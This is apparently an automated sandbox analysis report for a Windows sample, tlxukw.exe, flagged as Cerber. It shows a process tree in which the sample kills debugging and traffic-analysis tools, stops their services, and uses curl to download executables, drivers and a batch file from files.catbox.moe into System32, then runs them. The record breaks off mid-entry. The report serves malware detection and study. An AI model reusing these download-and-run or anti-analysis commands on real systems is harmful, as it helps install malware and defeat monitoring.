Resubmissions

18-02-2025 15:36

250218-s2ecessphn 8

18-02-2025 13:36

250218-qwfbes1kgj 10

Analysis

  • max time kernel
    42s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2025 13:36

General

  • Target

    tlxukw.exe

  • Size

    1.0MB

  • MD5

    82313dfe6f96318d2bad9d09e7da5992

  • SHA1

    ef8a3174da2e86da4360d0b5629eb7fbf7b6e0e0

  • SHA256

    3555b6ac9ca1e6926230398f45510da70f809ce11a15111a33c962af7d9ff5ec

  • SHA512

    dc0fc8c6927fc856c3cd96604ba9891a67903520914c8a67b294f8c048dbc561e377b00fffeed78dc02d7915590b2afa2deec859994f080d46299a0f202a1640

  • SSDEEP

    24576:ky14BInvdGh9DmvJhYRJhKK3mUqDH9BORt7orRnQxhLzhjzrue4D:ky14QU7DmvJ63mVwt7orRnQxhLNjzr8D

Malware Config

Signatures

  • Cerber 28 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Cerber family
  • Downloads MZ/PE file 4 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Drops file in System32 directory 5 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Kills process with taskkill 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tlxukw.exe
    "C:\Users\Admin\AppData\Local\Temp\tlxukw.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:448
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im HTTPDebuggerUI.exe
        3⤵
        • Cerber
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1640
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im HTTPDebuggerSvc.exe
        3⤵
        • Cerber
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Windows\system32\sc.exe
        sc stop HTTPDebuggerPro
        3⤵
        • Launches sc.exe
        PID:724
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2520
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:772
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2428
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4896
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:376
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3552
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3740
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3196
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3220
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\system32\sc.exe
        sc stop HTTPDebuggerPro
        3⤵
        • Launches sc.exe
        PID:1172
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\system32\sc.exe
        sc stop KProcessHacker3
        3⤵
        • Launches sc.exe
        PID:692
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
      2⤵
        PID:4708
        • C:\Windows\system32\sc.exe
          sc stop KProcessHacker2
          3⤵
          • Launches sc.exe
          PID:4072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
        2⤵
          PID:1220
          • C:\Windows\system32\sc.exe
            sc stop KProcessHacker1
            3⤵
            • Launches sc.exe
            PID:4024
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
          2⤵
            PID:1028
            • C:\Windows\system32\sc.exe
              sc stop wireshark
              3⤵
              • Launches sc.exe
              PID:612
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
            2⤵
              PID:380
              • C:\Windows\system32\sc.exe
                sc stop npf
                3⤵
                • Launches sc.exe
                PID:1632
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
              2⤵
                PID:4444
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im HTTPDebuggerUI.exe
                  3⤵
                  • Cerber
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2740
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                2⤵
                  PID:4036
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im HTTPDebuggerSvc.exe
                    3⤵
                    • Cerber
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5084
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                  2⤵
                    PID:4684
                    • C:\Windows\system32\sc.exe
                      sc stop HTTPDebuggerPro
                      3⤵
                      • Launches sc.exe
                      PID:1652
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                    2⤵
                      PID:2296
                      • C:\Windows\system32\taskkill.exe
                        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1956
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                      2⤵
                        PID:4932
                        • C:\Windows\system32\taskkill.exe
                          taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1576
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                        2⤵
                          PID:4432
                          • C:\Windows\system32\taskkill.exe
                            taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3052
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                          2⤵
                            PID:3992
                            • C:\Windows\system32\taskkill.exe
                              taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3564
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                            2⤵
                              PID:3760
                              • C:\Windows\system32\taskkill.exe
                                taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2308
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
                              2⤵
                                PID:824
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4948
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                2⤵
                                  PID:4548
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1944
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                  2⤵
                                    PID:4100
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                      3⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2608
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                    2⤵
                                      PID:4328
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                        3⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4324
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                      2⤵
                                        PID:4668
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                          3⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5036
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                        2⤵
                                          PID:3152
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                            3⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1656
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                          2⤵
                                            PID:4868
                                            • C:\Windows\system32\sc.exe
                                              sc stop HTTPDebuggerPro
                                              3⤵
                                              • Launches sc.exe
                                              PID:3780
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                            2⤵
                                              PID:3600
                                              • C:\Windows\system32\sc.exe
                                                sc stop KProcessHacker3
                                                3⤵
                                                • Launches sc.exe
                                                PID:4208
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                              2⤵
                                                PID:1364
                                                • C:\Windows\system32\sc.exe
                                                  sc stop KProcessHacker2
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:5096
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                2⤵
                                                  PID:1928
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop KProcessHacker1
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:5048
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                  2⤵
                                                    PID:3320
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop wireshark
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:1472
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                    2⤵
                                                      PID:4248
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop npf
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:4728
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\tlxukw.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                      2⤵
                                                        PID:3960
                                                        • C:\Windows\system32\certutil.exe
                                                          certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\tlxukw.exe" MD5
                                                          3⤵
                                                            PID:2040
                                                          • C:\Windows\system32\find.exe
                                                            find /i /v "md5"
                                                            3⤵
                                                              PID:2496
                                                            • C:\Windows\system32\find.exe
                                                              find /i /v "certutil"
                                                              3⤵
                                                                PID:1812
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c cls
                                                              2⤵
                                                                PID:2640
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/gv7xzv.bat --output C:\Windows\System32\Tasks\mac.bat >nul 2>&1
                                                                2⤵
                                                                  PID:4584
                                                                  • C:\Windows\system32\curl.exe
                                                                    curl --silent https://files.catbox.moe/gv7xzv.bat --output C:\Windows\System32\Tasks\mac.bat
                                                                    3⤵
                                                                    • Drops file in System32 directory
                                                                    PID:1248
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sdfbn8.sys --output C:\Windows\System32\Tasks\winxsrcsv64.EXE >nul 2>&1
                                                                  2⤵
                                                                    PID:376
                                                                    • C:\Windows\system32\curl.exe
                                                                      curl --silent https://files.catbox.moe/sdfbn8.sys --output C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                      3⤵
                                                                      • Downloads MZ/PE file
                                                                      • Drops file in System32 directory
                                                                      PID:2896
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/n6i5j0.sys --output C:\Windows\System32\Tasks\winxsrcsv64.sys >nul 2>&1
                                                                    2⤵
                                                                      PID:3496
                                                                      • C:\Windows\system32\curl.exe
                                                                        curl --silent https://files.catbox.moe/n6i5j0.sys --output C:\Windows\System32\Tasks\winxsrcsv64.sys
                                                                        3⤵
                                                                        • Downloads MZ/PE file
                                                                        • Drops file in System32 directory
                                                                        PID:2868
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/j7goj8.sys --output C:\Windows\System32\Tasks\iqvw64e.sys >nul 2>&1
                                                                      2⤵
                                                                        PID:1264
                                                                        • C:\Windows\system32\curl.exe
                                                                          curl --silent https://files.catbox.moe/j7goj8.sys --output C:\Windows\System32\Tasks\iqvw64e.sys
                                                                          3⤵
                                                                          • Downloads MZ/PE file
                                                                          • Drops file in System32 directory
                                                                          PID:4184
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/xre5ck --output C:\Windows\System32\Tasks\Volumeid64.exe >nul 2>&1
                                                                        2⤵
                                                                          PID:2304
                                                                          • C:\Windows\system32\curl.exe
                                                                            curl --silent https://files.catbox.moe/xre5ck --output C:\Windows\System32\Tasks\Volumeid64.exe
                                                                            3⤵
                                                                            • Downloads MZ/PE file
                                                                            • Drops file in System32 directory
                                                                            PID:2580
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IVN >nul 2>&146OO27BK3JK6RWM4
                                                                          2⤵
                                                                            PID:2936
                                                                            • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                              C:\Windows\System32\Tasks\winxsrcsv64.EXE /IVN 46OO27BK3JK6RWM4
                                                                              3⤵
                                                                              • Cerber
                                                                              • Executes dropped EXE
                                                                              PID:4564
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV >nul 2>&19TE6WC2CXTF0YVXN
                                                                            2⤵
                                                                              PID:2756
                                                                              • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV 9TE6WC2CXTF0YVXN
                                                                                3⤵
                                                                                • Cerber
                                                                                • Executes dropped EXE
                                                                                PID:2612
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV >nul 2>&1LPHFKMEIX7INHXPL
                                                                              2⤵
                                                                                PID:4676
                                                                                • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                  C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV LPHFKMEIX7INHXPL
                                                                                  3⤵
                                                                                  • Cerber
                                                                                  • Executes dropped EXE
                                                                                  PID:3788
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SM >nul 2>&1UGG9FU5PG2G7LAD7
                                                                                2⤵
                                                                                  PID:1632
                                                                                  • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SM UGG9FU5PG2G7LAD7
                                                                                    3⤵
                                                                                    • Cerber
                                                                                    • Executes dropped EXE
                                                                                    PID:380
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SP >nul 2>&1X8S6Y24IQ3YDGRWH
                                                                                  2⤵
                                                                                    PID:3604
                                                                                    • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                      C:\Windows\System32\Tasks\winxsrcsv64.EXE /SP X8S6Y24IQ3YDGRWH
                                                                                      3⤵
                                                                                      • Cerber
                                                                                      • Executes dropped EXE
                                                                                      PID:1580
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SV >nul 2>&1Q0BQTI2GEH0GA27D
                                                                                    2⤵
                                                                                      PID:1348
                                                                                      • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                        C:\Windows\System32\Tasks\winxsrcsv64.EXE /SV Q0BQTI2GEH0GA27D
                                                                                        3⤵
                                                                                        • Cerber
                                                                                        • Executes dropped EXE
                                                                                        PID:3812
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SS >nul 2>&1GMMU5VH0XOZ5D3QG
                                                                                      2⤵
                                                                                        PID:4036
                                                                                        • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                          C:\Windows\System32\Tasks\winxsrcsv64.EXE /SS GMMU5VH0XOZ5D3QG
                                                                                          3⤵
                                                                                          • Cerber
                                                                                          • Executes dropped EXE
                                                                                          PID:4416
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO >nul 2>&1
                                                                                        2⤵
                                                                                          PID:4960
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            cmd /C C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO
                                                                                            3⤵
                                                                                              PID:4764
                                                                                              • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO
                                                                                                4⤵
                                                                                                • Cerber
                                                                                                • Executes dropped EXE
                                                                                                PID:3020
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SK >nul 2>&1FXVENWBVDWL1T4GO
                                                                                            2⤵
                                                                                              PID:704
                                                                                              • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                C:\Windows\System32\Tasks\winxsrcsv64.EXE /SK FXVENWBVDWL1T4GO
                                                                                                3⤵
                                                                                                • Cerber
                                                                                                • Executes dropped EXE
                                                                                                PID:2396
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SF >nul 2>&10CT9XEK0CY52P5W8
                                                                                              2⤵
                                                                                                PID:1576
                                                                                                • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                  C:\Windows\System32\Tasks\winxsrcsv64.EXE /SF 0CT9XEK0CY52P5W8
                                                                                                  3⤵
                                                                                                  • Cerber
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4932
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BM >nul 2>&157D2QXBQNSUXWXFA
                                                                                                2⤵
                                                                                                  PID:1864
                                                                                                  • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BM 57D2QXBQNSUXWXFA
                                                                                                    3⤵
                                                                                                    • Cerber
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3052
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BP >nul 2>&1B23PY208EPJR9FOD
                                                                                                  2⤵
                                                                                                    PID:4432
                                                                                                    • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                      C:\Windows\System32\Tasks\winxsrcsv64.EXE /BP B23PY208EPJR9FOD
                                                                                                      3⤵
                                                                                                      • Cerber
                                                                                                      • Executes dropped EXE
                                                                                                      PID:316
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BV >nul 2>&19AMPLEW8IRD2BOVN
                                                                                                    2⤵
                                                                                                      PID:2024
                                                                                                      • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                        C:\Windows\System32\Tasks\winxsrcsv64.EXE /BV 9AMPLEW8IRD2BOVN
                                                                                                        3⤵
                                                                                                        • Cerber
                                                                                                        • Executes dropped EXE
                                                                                                        PID:700
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BS >nul 2>&1Z6STLC2H4017YQOT
                                                                                                      2⤵
                                                                                                        PID:744
                                                                                                        • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                          C:\Windows\System32\Tasks\winxsrcsv64.EXE /BS Z6STLC2H4017YQOT
                                                                                                          3⤵
                                                                                                          • Cerber
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4936
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BT >nul 2>&1VUG9WWBWZPONSUMN
                                                                                                        2⤵
                                                                                                          PID:864
                                                                                                          • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                            C:\Windows\System32\Tasks\winxsrcsv64.EXE /BT VUG9WWBWZPONSUMN
                                                                                                            3⤵
                                                                                                            • Cerber
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3036
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BLC >nul 2>&1RGIRHUVXPV01FN2O
                                                                                                          2⤵
                                                                                                            PID:4440
                                                                                                            • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                              C:\Windows\System32\Tasks\winxsrcsv64.EXE /BLC RGIRHUVXPV01FN2O
                                                                                                              3⤵
                                                                                                              • Cerber
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1272
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CM >nul 2>&1K76GJIVNKFAPJ2QA
                                                                                                            2⤵
                                                                                                              PID:3332
                                                                                                              • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                C:\Windows\System32\Tasks\winxsrcsv64.EXE /CM K76GJIVNKFAPJ2QA
                                                                                                                3⤵
                                                                                                                • Cerber
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3580
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CV >nul 2>&1J00RV0N2KI9LTDJU
                                                                                                              2⤵
                                                                                                                PID:1460
                                                                                                                • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                  C:\Windows\System32\Tasks\winxsrcsv64.EXE /CV J00RV0N2KI9LTDJU
                                                                                                                  3⤵
                                                                                                                  • Cerber
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3464
                                                                                                              • C:\Windows\system32\cmd.exe
